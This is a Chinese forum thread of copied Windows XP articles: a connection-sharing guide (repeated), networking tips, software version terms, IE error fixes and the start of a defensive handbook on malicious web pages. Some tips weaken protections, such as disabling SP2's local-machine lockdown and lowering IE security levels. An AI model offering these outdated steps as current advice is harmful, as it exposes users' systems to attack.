[推荐]多方收集的Winodws Xp相关技术文章(编辑03.05更新)~!
- 主题发起人 networkvast
- 开始时间
Windows XP操作系统共享上网完全攻略
"Internet连接共享",曾出现在Windows 98(SE)/Me/2000的功能,现在在Windows XP中得以完善和增强,它让局域网内的多台PC,通过其中一台已与Internet连接的PC来连接Internet,从而达到多台PC共享一条Internet连接线路上网的目的,并提供防火墙的保护。
由于实现共享上网的网络结构有很多种,不能一一列举,所以在此选取了两种典型的网络结构来介绍Windows XP的"Internet连接共享"。
一、局域网内多于两台PC,Internet接入方式为宽带接入
1.网络结构图如下
说明:网关主机装有两个网卡,其中网卡A1通过ADSL、Cable Modem或以太网口(多出现在宽带住宅小区、智能商业大厦和校园网)等宽带方式接入Internet,网卡A2跟集线器或交换机相连,与PC1和PC2处于同一局域网内。PC1和PC2各装有一个网卡跟集线器或交换机相连,在局域网内,通过共享网关主机的Internet 连接来上网。如果局域网内增加了PC,只需把新PC接到集线器或交换机就可上网。
2.网关主机的设置
操作系统是Windows XP,"开始"->"控制面板"->"网络和Internet连接"->"网络连接",就会看到两个网卡的连接图标。
"Local Area Connection 1"即网卡A1,与Internet连接;"Local Area Connection 2"即网卡A2,联,联于局域网。"Local Area Connection 1"的TCP/IP设置应视不同的宽带接入方式而不同,可以是自动获取IP地址和DNS,也可以配固定IP地址和DNS(由ISP提供给你的),用户应按ISP提供的使用说明来配置,这里不作详述了。
下面我们就要把这个Internet连接共享出来,右击"Local Area Connection 1"->"属性"->"高级",把"Internet连接防火墙"和"Internet连接共享"的三项钩选,
按"确定",此时会出现一对话框提示会改变另一网卡的TCP/IP设置,按"Yes"。
这样共享就启用,网卡图标变成这个样子。
现在我们查看"Local Area Connection 2"的TCP/IP设置,右击"Local Area Connection 2"->"属性"->"Internet Protocol (TCP/IP)"->"属性",看到IP地址被系统设置为192.168.0.1。
这个IP地址是可改变的,根据本局域网的使用者的具体要求而定了,但在本例中我们不作修改,按取消退出此对话框。网关主机的设置完成,已经共享了Internet连接并有防火墙功能,可保护整个局域网内的所有机器不被非法访问。
3.局域网内PC1的配置
操作系统可以是任何网络操作系统,除了Windows系列,还可以是Linux或Unix。只要设置网卡的IP地址、子网掩码、默认网关和DNS。IP地址设为与网关主机网卡A2处于同一子网的地址,但不能重复,子网掩码跟网关主机网卡A2的一样,默认网关和DNS设为网关主机的网卡A2的IP地址。如果是Windows XP系统,可按下图设置。
确定后,打开IE就可以上网了,当然前提是网关主机已经连接上Internet。
4.局域网内PC2的配置
PC2的设置跟PC1基本相同,只是IP地址不同,如上例PC1的IP地址是192.168.0.2,那么PC2的IP地址就可以设为192.168.0.3,只要是本子网内没用过的IP地址就行了。
5.网关主机内的防火墙设置
假如网关主机开启了远程桌面(《Windows XP远程体验》中介绍过)的功能,同时又开启了防火墙,Internet上的其他在线用户是不能远程登录你的系统的,但如果你希望一位专家远程登录到本局域网内的任何一台PC(包括网关主机,这台PC要具备远程桌面的功能),帮自己解决难题呢,那就按以下操作吧:(以刚才的网关主机为例子说明)右击"Local Area Connection 1"->"属性"->"高级"->"设置",钩选"远程桌面",输入要被专家登陆的机器的IP地址或计算机名,按三次"确定"完成,专家就可透过防火墙登陆到本局域网内的任何一台PC。
同样的方法,可以控制局域网的Web服务或FTP服务等是否可以对外开放,只要像刚才那样钩选不同的服务即可。
二、局域网内只有两台PC,Internet接入方式为普通电话拨号
1.网络结构图如下
说明:网关主机跟一个普通的与电话线相连的Modem连接,还装有一个网卡。PC1也装有一个网卡,两个网卡用交叉线相连(网上有许多介绍交叉线做法的文章),构成最简单的局域网,PC1共享网关主机的Internet 连接来上网。这种网络结构是不适合扩展的。
2.网关主机的设置
操作系统是Windows XP。绝大多数的Modem会被系统自动识别并安装驱动,下面我们就来建一个新的拨号连接:"开始"->"控制面板"->"网络和Internet连接"->"网络连接"->"创建一个新的连接"->"下一步"->"连接到Internet"->"下一步"->"手动设置我的连接"->"下一步"->"用拨号调制解调器连接"->"下一步"->输入ISP名称:中国电信96169 ->"下一步" ->输入拨号的电话号码,如96169->"下一步"->输入用户名和密码->"下一步"->"完成"。网络连接中多了一个拨号的图标。
要共享这个Internet连接只要右击拨号图标->"属性"->"高级",以后的设置就跟案例一里所说的一样了,包括跟局域网相连的那个网卡的设置。
3.局域网内PC的配置
跟案例一中的PC1的设置一样.防火墙的设置如上所述。只要网关主机拨号上网后,这个小型局域网共享上网的模式即可运作起来。
随着宽带网络的普及,家庭内组建小型局域网并共享Internet连接资源来上网的模式将会越来越多,Windows XP为这种模式提供了廉价、安全、简洁和易维护的解决方案。
Windows XP操作系统网络应用最新技巧
Windows XP作为Windows 9x/Me及Windows 2000的后身,分它对网络的支持达到了一个前所未有的高度,但在某些方面也有一些用处很大的技巧,在平时的工作学习中我总结了以下几点,供大家分享!
1.XP选程桌面漏洞解决办法
Windows XP提供了远程桌面功能,目前被证实存在设计缺陷,可能导致攻击者得到系统远程桌面的账户信息,有助于其进一步攻击。当连接建立的时候,用Windows XP远程桌面把账户名以明文发送给连接它的客户端。发送的账户名不一定是远端主机的用户账号,而是最常被客户端使用的账户名,网络上的嗅探程序可能会捕获到这些账户信息。
解决方法:到微软主页下载相应的补丁程序,并暂时停止远程桌面的使用,方法是:右键单击“我的电脑”,选择“属性”,在弹出的窗口中,选“远程”标签,勾掉“允许用户远程连接到这台计算机”复选框前的钩,点“确定”即可。
2.简单修复IE标题栏及主页地址
现在,一些比较可恶的网站会私自修改你的IE标题栏、首页、右键菜单,有些在启动时还会弹出一个弹出访问某网站的对话框,真是非常令人烦恼。有些文章介绍如何修改注册表来解决,但是对于对注册表不熟悉的人来说是比较危险。其实,这里有一个很简单的方法,大家只要打开“组策略”窗口,找到“用户配置/Internet Explorer维护”项,就可以看到一个“浏览器用户界面”,双击右侧窗口中的“浏览器标题”项,然后你只需勾选“自定义标题栏”,再将下面文本框中的文字修改为所需要的内容即可。如果主页被恶意锁定,就展开“Internet Explorer维护”,可以找到下面的“URL”,再双击右侧窗口中的“重要URL”项,然后再操作即可。
3.安装无线网络
当您在计算机中插入一块无线网络适配器时,XP会自动弹出一个“连接到无线网络”的对话框。用鼠标右键点击系统栏中的无线网络图标,然后在弹出菜单中选择“查看可以使用的无线网络”,并从中选择您指定的无线连接,最后点击“连接”按钮。如果您没有看到这个图标,请在“资源管理器”或者文件夹窗口的地址栏键入“控制面板/网络连接”,然后用鼠标右键点击无线网络连接的图标即可。
4.SP2 系统访问网络的时候HTML文件中的图片无法显示
由于SP2中的增强型安全功能,有些用户反映在安装 SP2后,有时在IE中打开HTML文件时,会出现一条 ActiveX 错误的信息,并且图片无法正常显示。这是因为,在默认状态下,SP2启用了帮助用户计算机防范恶意攻击的安全策略。
解决方法:打开注册表编辑器,进入“HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerMainFeatureControl FEATURE_LOCALMACHINE_LOCKDOWN”分支,将窗口右侧的“iexplore.exe”和“explorer.exe”两个键的值改为“0”后重新启动Windows即可。
5.通过ICS实现internet共享
现在你也不再需要WinGate,Sysgate等共享软件实现Internet实现共享了,因为在windows XP中有一个共享程序,我们只要按照向导的提示一步步操作下去就可以了。
6.禁止向微软报告错误
如果正在运行的程序出现错误,就会有一个报告错误的窗口出现,询问是否要向Microsoft报告错误。关闭这个功能能节省时间,你可以禁用这个报告错误的功能,禁用该功能的步骤如下:在“控制面板”中打开“系统”;选择“高级”选项卡;点击“错误汇报”按钮;点击“禁用错误汇报”。点击“确定”即可。
"Internet连接共享",曾出现在Windows 98(SE)/Me/2000的功能,现在在Windows XP中得以完善和增强,它让局域网内的多台PC,通过其中一台已与Internet连接的PC来连接Internet,从而达到多台PC共享一条Internet连接线路上网的目的,并提供防火墙的保护。
由于实现共享上网的网络结构有很多种,不能一一列举,所以在此选取了两种典型的网络结构来介绍Windows XP的"Internet连接共享"。
一、局域网内多于两台PC,Internet接入方式为宽带接入
1.网络结构图如下
说明:网关主机装有两个网卡,其中网卡A1通过ADSL、Cable Modem或以太网口(多出现在宽带住宅小区、智能商业大厦和校园网)等宽带方式接入Internet,网卡A2跟集线器或交换机相连,与PC1和PC2处于同一局域网内。PC1和PC2各装有一个网卡跟集线器或交换机相连,在局域网内,通过共享网关主机的Internet 连接来上网。如果局域网内增加了PC,只需把新PC接到集线器或交换机就可上网。
2.网关主机的设置
操作系统是Windows XP,"开始"->"控制面板"->"网络和Internet连接"->"网络连接",就会看到两个网卡的连接图标。
"Local Area Connection 1"即网卡A1,与Internet连接;"Local Area Connection 2"即网卡A2,联,联于局域网。"Local Area Connection 1"的TCP/IP设置应视不同的宽带接入方式而不同,可以是自动获取IP地址和DNS,也可以配固定IP地址和DNS(由ISP提供给你的),用户应按ISP提供的使用说明来配置,这里不作详述了。
下面我们就要把这个Internet连接共享出来,右击"Local Area Connection 1"->"属性"->"高级",把"Internet连接防火墙"和"Internet连接共享"的三项钩选,
按"确定",此时会出现一对话框提示会改变另一网卡的TCP/IP设置,按"Yes"。
这样共享就启用,网卡图标变成这个样子。
现在我们查看"Local Area Connection 2"的TCP/IP设置,右击"Local Area Connection 2"->"属性"->"Internet Protocol (TCP/IP)"->"属性",看到IP地址被系统设置为192.168.0.1。
这个IP地址是可改变的,根据本局域网的使用者的具体要求而定了,但在本例中我们不作修改,按取消退出此对话框。网关主机的设置完成,已经共享了Internet连接并有防火墙功能,可保护整个局域网内的所有机器不被非法访问。
3.局域网内PC1的配置
操作系统可以是任何网络操作系统,除了Windows系列,还可以是Linux或Unix。只要设置网卡的IP地址、子网掩码、默认网关和DNS。IP地址设为与网关主机网卡A2处于同一子网的地址,但不能重复,子网掩码跟网关主机网卡A2的一样,默认网关和DNS设为网关主机的网卡A2的IP地址。如果是Windows XP系统,可按下图设置。
确定后,打开IE就可以上网了,当然前提是网关主机已经连接上Internet。
4.局域网内PC2的配置
PC2的设置跟PC1基本相同,只是IP地址不同,如上例PC1的IP地址是192.168.0.2,那么PC2的IP地址就可以设为192.168.0.3,只要是本子网内没用过的IP地址就行了。
5.网关主机内的防火墙设置
假如网关主机开启了远程桌面(《Windows XP远程体验》中介绍过)的功能,同时又开启了防火墙,Internet上的其他在线用户是不能远程登录你的系统的,但如果你希望一位专家远程登录到本局域网内的任何一台PC(包括网关主机,这台PC要具备远程桌面的功能),帮自己解决难题呢,那就按以下操作吧:(以刚才的网关主机为例子说明)右击"Local Area Connection 1"->"属性"->"高级"->"设置",钩选"远程桌面",输入要被专家登陆的机器的IP地址或计算机名,按三次"确定"完成,专家就可透过防火墙登陆到本局域网内的任何一台PC。
同样的方法,可以控制局域网的Web服务或FTP服务等是否可以对外开放,只要像刚才那样钩选不同的服务即可。
二、局域网内只有两台PC,Internet接入方式为普通电话拨号
1.网络结构图如下
说明:网关主机跟一个普通的与电话线相连的Modem连接,还装有一个网卡。PC1也装有一个网卡,两个网卡用交叉线相连(网上有许多介绍交叉线做法的文章),构成最简单的局域网,PC1共享网关主机的Internet 连接来上网。这种网络结构是不适合扩展的。
2.网关主机的设置
操作系统是Windows XP。绝大多数的Modem会被系统自动识别并安装驱动,下面我们就来建一个新的拨号连接:"开始"->"控制面板"->"网络和Internet连接"->"网络连接"->"创建一个新的连接"->"下一步"->"连接到Internet"->"下一步"->"手动设置我的连接"->"下一步"->"用拨号调制解调器连接"->"下一步"->输入ISP名称:中国电信96169 ->"下一步" ->输入拨号的电话号码,如96169->"下一步"->输入用户名和密码->"下一步"->"完成"。网络连接中多了一个拨号的图标。
要共享这个Internet连接只要右击拨号图标->"属性"->"高级",以后的设置就跟案例一里所说的一样了,包括跟局域网相连的那个网卡的设置。
3.局域网内PC的配置
跟案例一中的PC1的设置一样.防火墙的设置如上所述。只要网关主机拨号上网后,这个小型局域网共享上网的模式即可运作起来。
随着宽带网络的普及,家庭内组建小型局域网并共享Internet连接资源来上网的模式将会越来越多,Windows XP为这种模式提供了廉价、安全、简洁和易维护的解决方案。
Windows XP操作系统网络应用最新技巧
Windows XP作为Windows 9x/Me及Windows 2000的后身,分它对网络的支持达到了一个前所未有的高度,但在某些方面也有一些用处很大的技巧,在平时的工作学习中我总结了以下几点,供大家分享!
1.XP选程桌面漏洞解决办法
Windows XP提供了远程桌面功能,目前被证实存在设计缺陷,可能导致攻击者得到系统远程桌面的账户信息,有助于其进一步攻击。当连接建立的时候,用Windows XP远程桌面把账户名以明文发送给连接它的客户端。发送的账户名不一定是远端主机的用户账号,而是最常被客户端使用的账户名,网络上的嗅探程序可能会捕获到这些账户信息。
解决方法:到微软主页下载相应的补丁程序,并暂时停止远程桌面的使用,方法是:右键单击“我的电脑”,选择“属性”,在弹出的窗口中,选“远程”标签,勾掉“允许用户远程连接到这台计算机”复选框前的钩,点“确定”即可。
2.简单修复IE标题栏及主页地址
现在,一些比较可恶的网站会私自修改你的IE标题栏、首页、右键菜单,有些在启动时还会弹出一个弹出访问某网站的对话框,真是非常令人烦恼。有些文章介绍如何修改注册表来解决,但是对于对注册表不熟悉的人来说是比较危险。其实,这里有一个很简单的方法,大家只要打开“组策略”窗口,找到“用户配置/Internet Explorer维护”项,就可以看到一个“浏览器用户界面”,双击右侧窗口中的“浏览器标题”项,然后你只需勾选“自定义标题栏”,再将下面文本框中的文字修改为所需要的内容即可。如果主页被恶意锁定,就展开“Internet Explorer维护”,可以找到下面的“URL”,再双击右侧窗口中的“重要URL”项,然后再操作即可。
3.安装无线网络
当您在计算机中插入一块无线网络适配器时,XP会自动弹出一个“连接到无线网络”的对话框。用鼠标右键点击系统栏中的无线网络图标,然后在弹出菜单中选择“查看可以使用的无线网络”,并从中选择您指定的无线连接,最后点击“连接”按钮。如果您没有看到这个图标,请在“资源管理器”或者文件夹窗口的地址栏键入“控制面板/网络连接”,然后用鼠标右键点击无线网络连接的图标即可。
4.SP2 系统访问网络的时候HTML文件中的图片无法显示
由于SP2中的增强型安全功能,有些用户反映在安装 SP2后,有时在IE中打开HTML文件时,会出现一条 ActiveX 错误的信息,并且图片无法正常显示。这是因为,在默认状态下,SP2启用了帮助用户计算机防范恶意攻击的安全策略。
解决方法:打开注册表编辑器,进入“HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerMainFeatureControl FEATURE_LOCALMACHINE_LOCKDOWN”分支,将窗口右侧的“iexplore.exe”和“explorer.exe”两个键的值改为“0”后重新启动Windows即可。
5.通过ICS实现internet共享
现在你也不再需要WinGate,Sysgate等共享软件实现Internet实现共享了,因为在windows XP中有一个共享程序,我们只要按照向导的提示一步步操作下去就可以了。
6.禁止向微软报告错误
如果正在运行的程序出现错误,就会有一个报告错误的窗口出现,询问是否要向Microsoft报告错误。关闭这个功能能节省时间,你可以禁用这个报告错误的功能,禁用该功能的步骤如下:在“控制面板”中打开“系统”;选择“高级”选项卡;点击“错误汇报”按钮;点击“禁用错误汇报”。点击“确定”即可。
软件各种版本一览
Alpha版(内部测试版):一般只在软件开发公司内部运行,不对外公开。主要是开发者自己对产品进行测试,检查产品是否存在缺陷、错误,验证产品功能与说明书、用户手册是否一致。
Beta版(外部测试版):软件开发公司为对外宣传,将非正式产品免费发送给具有典型性的用户,让用户测试该软件的不足之处及存在问题,以便在正式发行前进一步改进和完善。一般可通过Internet免费下载,也可以向软件公司索取。
trail( 试用版):含有某些限制,如时间、功能,注册后也有可能变为正式版。
RC :是 Release Candidate 的缩写,意思是发布倒计时,该版本已经完成全部功能并清除大部分的BUG。到了这个阶段只会除BUG,不对软件做任何大的更改。
Demo版(演示版):主要是演示正式软件的部分功能,用户可以从中得知软件的基本操作,为正式产品的发售扩大影响。如果是游戏的话,则只有一两个关卡可以玩。该版本也可以从Internet上免费下载。
Preview :预览版。
Shareware版(共享版):有些公司为了吸引客户,对于他们制作的某些软件,可以让用户通过Internet免费下载的方式获取。不过,此版本软件多会带有一些使用时间或者次数的限制,还有可能是会有很多广告(如Flashget),但可以利用在线注册或电子注册成为正式版用户。
Free版(自由版):这一般是个人或自由软件联盟组织的成员制作的软件,希望免费给大家使用,没有版权,一般也是通过Internet免费下载。
Cardware: 属共享软件的一种,只要给作者回复一封电邮或明信片即可。(有的作者并由此提供注册码等),目前这种形式已不多见。
RTM 版:这基本就是最终的版本,英文是 Release To Manufactur,意思是发布到生产商。
Release版(发行版):不是正式版,带有时间限制,也是为扩大影响所做的宣传策略之一。比如Windows Me的发行版就限制了只能使用几个月,可从Internet上免费下载或由公司免费奉送。
Enhace版(增强版或加强版):如果是一般软件,一般称作“增强版”,会加入一些实用的新功能。如果是游戏,一般称作加强版”,会加入一些新的游戏场景和游戏情节等。这是正式发售的版本。
Full Version版(完全版):也就是正式版,是最终正式发售的版本。
Retail :零售版。
Corporation & Enterprise :企业版。
Standard :标准版。
Mini :迷你版也叫精简版只有最基本的功能。
Premium : 贵价版。
Professional :专业版。
Express :特别版。
Deluxe :豪华版。
Uprgade/Update版(升级版):当你有某个软件以前的正式版本时,可以购买升级版,将你的软件升级为最新版。升级后的软件与正式版在功能上相同,但价格会低些,这主要是为了给原有的正版用户提供优惠。
Plus:属增强版,不过这种大部分是在程序界面及多媒体功能上增强。
Regged:已注册版
CN / SC:简体中文版
CHT/TC:繁体中文版
EN:英文版
Multilanguage:多国语言版
Rip: 是指从原版文件(一般是指光盘或光盘镜像文件)直接将有用的内容(核心内容)分离出来,剔除无用的文档,例如PDF说明文件、视频演示之类的东西,也可以算做是精简版…但主要内容功能是一点也不能缺少!另:DVDrip是指将视频和音频直接从DVD光盘里以文件方式分离出来。
Original Equipment Manufacturer (OEM) :贴牌生产,是给电脑生产厂的版本。
Full Packaged Product (FPP)–Retail : FPP就是零售版(盒装软件),这种产品的光盘的卷标都带有FPP字样,比如英文WXP Pro的FPP版本的光盘卷标就是WXPFPP_EN,其中WX表示是Windows XP,P是Professional(H是Home),FPP表明是零售版本,EN是表明是英语。获得途径除了在商店购买之外,某些MSDN用户也可以得到。
Volume Licensing for Organizations (VLO):团体批量许可证(大量采购授权合约),这是为团体购买而制定的一种优惠方式。这种产品的光盘的卷标都带有VOL字样,取Volume前3个字母,以表明是批量,比如英文WXP Pro的VOL版本的光盘卷标就是WXPVOL_EN,其中WX表示是Windows XP,P是Professional(VOL没有Home版本),VOL表明是团体批量许可证版本,EN是表明是英语。获得途径主要是集团购买,某些MSDN用户也可以得到。这种版本根据购买数量等又细分为“开放式许可证”、“选择式许可证”、“企业协议”、学术教育许可证”等以下5种版本:Open License 、Select License、Enterprise Agreement、Enterprise Subscription Agreement、Academic Volume Licensing。
由此可见,平时说的什么Select/Corp是许可证授权方式,他的出现是为了用若干种不同级别的优惠政策卖同一种软件,通过Select/Corp许可证授权方式得到的xxx的光盘都是VOL这一种、是并不是有很多种,只不过是相同的VOL光盘配以不同的许可证方式;而Volume Licensing (Product) Keys,即VLK,它所指的只是一个Key(密匙),仅仅是一个为证明产品合法化、以及安装所使用的Key,因为根据VOL计划规定,VOL产品是不需要激活的,或者说,VLK不是指一种版本,而是指这种版本在部署(Deploy)过程中所需要的Key,而需要VLK这种Key的版本应该叫做VOL!只不过在实际中,没有必要强调这种叫法、称呼的准确性,加之很多人的VOL版本光盘是通过企业的选择式许可证、企业协议等方式得到的等等原因,所以才会有很多人叫他为“选择版”等等。 官方网站有一个表格,上面有一句话:“Different products require different Volume Licensing Keys (VLKs). Refer to the table below to make sure you have the correct VLK for your Microsoft product.”,这就很好的说明了VLK指的是Key而不是产品了。 很明显的,FPP需要激活,VOL不需要激活。
总的来说,如果你在版本号中看到有字母,大多非正式版本。但也有一些软件比较特别,一直是beta版本,而从来没有正式版本的。
版本号的问题:也就是那一串数字。
一般形式为 "ver a.b.c"。这中间,a为主版本号。b为次版本号。c为更次。
次版本号的更新表示软件有微小的升级,一般不涉及bug的修正,如果您觉得次版本号更新频繁,可以不必理会,等主版本号更换后再作升级。当程序有比较大的升级时,将更换主版本号。
一般来说如果主版本号a.b升过级,都会要求重新注册或者购买。特别是a。有些软件如果升b,也还是可以使用原来的注册信息,不必重新注册的。
IE常见错误分析
当你驾着心爱的IE在Internet上纵横驰骋时,突然桌面上弹出一个莫名其妙的警告提示框,紧接着所有IE窗口全部关闭;或无论如何点击链接
,IE始终没有反应……这些故障让人心烦意乱,无可奈何。不过你也不用手足无措,今天我们就一起将IE常见错误揪出来,并彻底消灭!
1.发送错误报告
【故障现象】
在使用IE浏览网页的过程中,出现“Microsoft Internet Explorer遇到问题需要关闭……”的信息提示。此时,如果单击“发送错误报告
”按钮,则会创建错误报告,单击“关闭”按钮之后会引起当前IE窗口关闭;如果单击“不发送”按钮,则会关闭所有IE窗口。
【故障点评】
这是IE为了解用户在使用中的错误而设计的一个小程序,不过我可不想当微软的“免费测试员”,更何况每天它都会面对成千上万的报告
,谁知道有没有在意我的报告问题呢?
【故障解决】
针对不同情况,可分别用以下方法关闭IE发送错误报告功能:
①对IE 5.x用户,执行“控制面板→添加或删除程序”,在列表中选择“Internet Explorer Error Reporting”选项,然后单击“更改/
删除”按钮,将其从系统中删除。
②对Windows 9x/Me/NT/2000下的IE 6.0用户,则可打开“注册表编辑器”,找[HKEY_LOCAL_MACHINE\Software \Microsoft\Internet
Explorer\Main],在右侧窗格创建名为IEWatsonEnabled的DWORD双字节值,并将其赋值为0。
③对Windows XP的IE 6.0用户,执行“控制面板→系统”,切换到“高级”选项卡,单击“错误报告”按钮,选中“禁用错误报告”选项
,并选中“但在发生严重错误时通知我”,最后单击“确定”按钮。
2.IE发生内部错误,窗口被关闭
【故障现象】
在使用IE浏览一些网页时,出现错误提示对话框:“该程序执行了非法操作,即将关闭……”,单击“确定”按钮后又弹出一个对话框,提
示“发生内部错误……”。单击“确定”按钮后,所有打开的IE窗口都被关闭。
【故障点评】
该错误产生原因多种多样,内存资源占用过多、IE安全级别设置与浏览的网站不匹配、与其他软件发生冲突、浏览网站本身含有错误代码
……这些情况都有可能,需要耐心加以解决。
【故障解决】
①关闭过多的IE窗口。如果在运行需占大量内存的程序,建议IE窗口打开数不要超过5个。
②降低IE安全级别。执行“工具→Internet选项”菜单,选择“安全”选项卡,单击“默认级别”按钮,拖动滑块降低默认的安全级别。
③将IE升级到最新版本。IE 6.0下载地址: http://download.sina.com.cn/cgi-bin...l.cgi?s_id=6041 。
可使用以IE为核心的浏览器,如MyIE2。它占用系统资源相对要少,而且当浏览器发生故障关闭时,下次启动它,会有“是否打开上次发生
错误时的页面”的提示,尽可能地帮你挽回损失。下载地址: http://dl.pconline.com.cn/html/1 ... &pn=0&.html
3.出现运行错误
【故障现象】
用IE浏览网页时弹出“出现运行错误,是否纠正错误”对话框,单击“否”按钮后,可以继续上网浏览。
【故障点评】
可能是所浏览网站本身的问题,也可能是由于IE对某些脚本不支持。
【故障解决】
①启动IE,执行“工具→Internet选项”菜单,选择“高级”选项卡,选中“禁止脚本调试”复选框,最后单击“确定”按钮即可。
②将IE浏览器升级到最新版本。
4.IE窗口始终最小化的问题
【故障现象】
每次打开的新窗口都是最小化窗口,即便单击“最大化”按钮后,下次启动IE后新窗口仍旧是最小化的。
【故障点评】
IE具有“自动记忆功能”,它能保存上一次关闭窗口后的状态参数,IE本身没有提供相关设置选项,不过可以借助修改注册表来实现。
【故障解决】
①打开“注册表编辑器”,找到[HKEY_ CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old WorkAreas],然后选
中窗口右侧的“OldWorkAreaRects”,将其删除。
②同样在“注册表编辑器”中找到[HKEY_CURRENT_USER\Software \Microsoft\Internet Explorer\Main],选择窗口右侧的“
Window_Placement”,将其删除。
③退出“注册表编辑器”,重启电脑,然后打开IE,将其窗口最大化,并单击“往下还原”按钮将窗口还原,接着再次单击“最大化”按
钮,最后关闭IE窗口。以后重新打开IE时,窗口就正常了!
5.IE无法打开新窗口
【故障现象】
在浏览网页过程中,单击超级链接无任何反应。
【故障点评】
多半是因为IE新建窗口模块被破坏所致。
【故障解决】
单击“开始→运行”,依次运行“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”将这两个DLL文件注册,然后重启系统。如果还
不行,则可以将mshtml.dll、urlmon.dll、msjava.dll、browseui.dll、oleaut32.dll、shell32.dll也注册一下。
6.脱机却无法浏览本机上的网页
【故障现象】
通过IE的“脱机浏览”功能,我们差不多能浏览所有已经下载到本地硬盘的网页内容,这对拨号上网的用户来说更是省钱的一****宝。但
有时,目标网页虽然在硬盘上,但是却提示“无法浏览”。
【故障点评】
这多半是由于你修改了系统时间,引起了IE历史记录的错乱。
【故障解决】
①可用直接在“临时文件夹”中搜索的方法来激活它。按下Win+F,在“包含文字”处输入部分记忆中的关键字,在“搜索”处按“浏览”
按钮选择IE临时文件夹的地址,如“C:\WINDOWS\Temporary Internet Files”,单击“开始查找”,在结果列表里双击目标页打开。
②可以尝试用腾讯的TE等浏览器来脱机浏览。
7.联网状态下,浏览器无法打开某些站点
【故障现象】
上网后,在浏览某些站点时遇到各种不同的连接错误。
【故障点评】
这种错误一般是由于网站发生故障或者你没有浏览权限所引起。
【故障解决】
针对不同的连接错误,IE会给出不同的错误信息提示,比较常见的有以下几个:
①提示信息:404 NOT FOUND这是最为常见的IE错误信息。主要是因为IE不能找到你所要求的网页文件,该文件可能根本不存在或者已经被
转移到了其他地方。
②提示信息:403 FORBIDDEN常见于需要注册的网站。一般情况下,可以通过在网上即时注册来解决该问题,但有一些完全“封闭”的网站
还是不能访问的。
③提示信息:500 SERVER ERROR通常由于所访问的网页程序设计错误或者数据库错误而引起,你只有等待对方网页纠正错误后再浏览了。
大家在遇到IE错误提示信息,但是搞不清楚的时候,可以去这里查阅: http://www.cfan.com.cn/09net/19ie.htm 。
8.IE无法重新安装
【故障现象】
IE不能正常使用,在重装时却提示“发现系统中有该版本的IE”而拒绝安装;“添加或删除程序”中又没有卸载选项。
【故障点评】
“重装”是解决IE故障的“终极****”,也是初级用户的法宝。
【故障解决】
①对IE 5.0的重装可按以下步骤进行:
第一步:打开“注册表编辑器”,找到[HKEY_LOCAL_ MACHINE\Software\Microsoft\Internet Explorer],单击其下的Version Vector
键。
第二步:在右侧窗格中双击IE子键,将原来的“5.0002”改为“4.0”,单击“确定”后退出“注册表编辑器”。
第三步:重启后,就可以重装IE 5.0了。
②IE 6.0的重装有两种方法:
方法1:打开“注册表编辑器”,找到[HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\
{89820200-ECBD-11cf-8B85-00AA005B4383}],将IsInstalled的DWORD值改为0就可以了。
方法2:放入Windows XP安装盘,在“开始→运行”窗口键入“rundll32.exe setupapi,InstallHinfSection DefaultInstall 132
%windir%\Inf\ie.inf”。
网络恶意代码安全手册
一、恶意代码的起源
电子邮件病毒的危害很多人已经深有体会,相信很多人都曾遭受过电子邮件的毒手。互联网上80%左右的流行病毒都是通过电子邮件传播的,我们相对来讲对电子邮件病毒都有了一定的防范意识,知道采取一些针对性的措施来防范邮件病毒。但同时,另外一种安全危险却被大家普遍忽视,那就是恶意网页。
其实恶意网页早就不是什么新鲜东西,甚至恶意网页的历史比电子邮件病毒的时间都长,它是伴随着互联网的出现而出现的,跟互联网同步发展;恶意网页前些年不像现在这么普遍存在,同时恶意网页大多数是在一些个人站点的页面上,访问的绝对数量不小,相对数量较少,同时恶意网页一般不具备传染性,所以恶意网页的危害性没有象电子邮件病毒一样产生那么大的危害。大部分是IE首页被修改等,但是自从“万花病毒”的出现改变了人们对网页代码的看法。
从去年开始,恶意网页的危害性渐渐的爆发出来,很多用户受到恶意网页的攻击,注册表被修改。恶意网页的比例上升的很快,到去年年底的时候恶意网页的求救信已经基本和邮件病毒持平,远远超过电子邮件病毒,所以,恶意网页已经成为互联网世界的头号敌人,虽然直接危害暂时还不能和电子邮件相抗衡,但是恶意网页将会是一个长期存在,对互联网安全构成重大威胁的新敌人,足以引起所有上网用户的重视。
网页恶意代码到底是怎么产生的呢?其实它也和病毒一样是人为制造出来的,早期的制造恶意代码的人大多数是出于个人目的,或是为了提高自己
3
网站的知名度、提高网站的浏览量,或者纯粹是一种恶作剧、一种破坏行为,他们通过在其开通的网站主页源程序里加入几行具有破坏性的代码,当用户打开网页进行浏览是能够修改用户的注册表,后果主要表现在IE默认主页被修改,发展到后来出现了最有代表性的具有破坏性的网页恶意代码如“万花病毒”和“混客绝情炸弹”。遭受恶意代码破坏的用户往往不清楚自己到底是遭受到病毒的破坏还是黑客的攻击,往往手足无措。这个时候往往需要手动修改注册表,而修改注册表对于普通用户来说又不是一件很容易的事,大多数都会不知所措。本文以网络上常见的恶意代码病毒详细的介绍了各种恶意代码的原理和预防、解决方法,使每一位朋友能解决在网络中遇到的问题。
二、恶意代码的解决方法
那么有没有一种新的办法能够有效的防止恶意网页的侵害呢?答案是肯定的,因为恶意代码都是通过利用ActiveX修改注册表重要键值来达到其破坏目的,我们实现对注册表的监视,禁止非法修改注册表就能起到防止作用,能够彻底断绝恶意网页的传播和非法破坏!对于已经受到恶意代码攻击的电脑我们可以自行修改注册表达到解决的方法。现在各个杀毒公司都在自己的软件监测中加入了恶意代码的分析和预防,把恶意代码列为病毒来查杀。如江民公司采用的“比特动态滤毒”技术来对付恶意网页,它一方面在网页下载到硬盘之前进行实时过滤分析,滤除有害部分代码,保留原有的网页内容,另一方面监视注册表,当注册表的重要系统键值被修改时,会自动报警。彻底断绝了恶意网页的传播途径!
4
三、恶意代码大曝光
恶意代码注意是通过插在网页中的代码来修改浏览者的注册表而起破坏作用的,如禁止注册表、修改IE首页、修改IE标题栏、修改IE右键菜单、修改IE默认搜索引擎、系统启动时弹出对话框、IE中鼠标右键失效、查看“源文件”菜单被禁用、部分菜单被禁止等。下面我们详细介绍他们的原理和修改方法。
1、浏览网页注册表被禁用
这是由于注册表
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
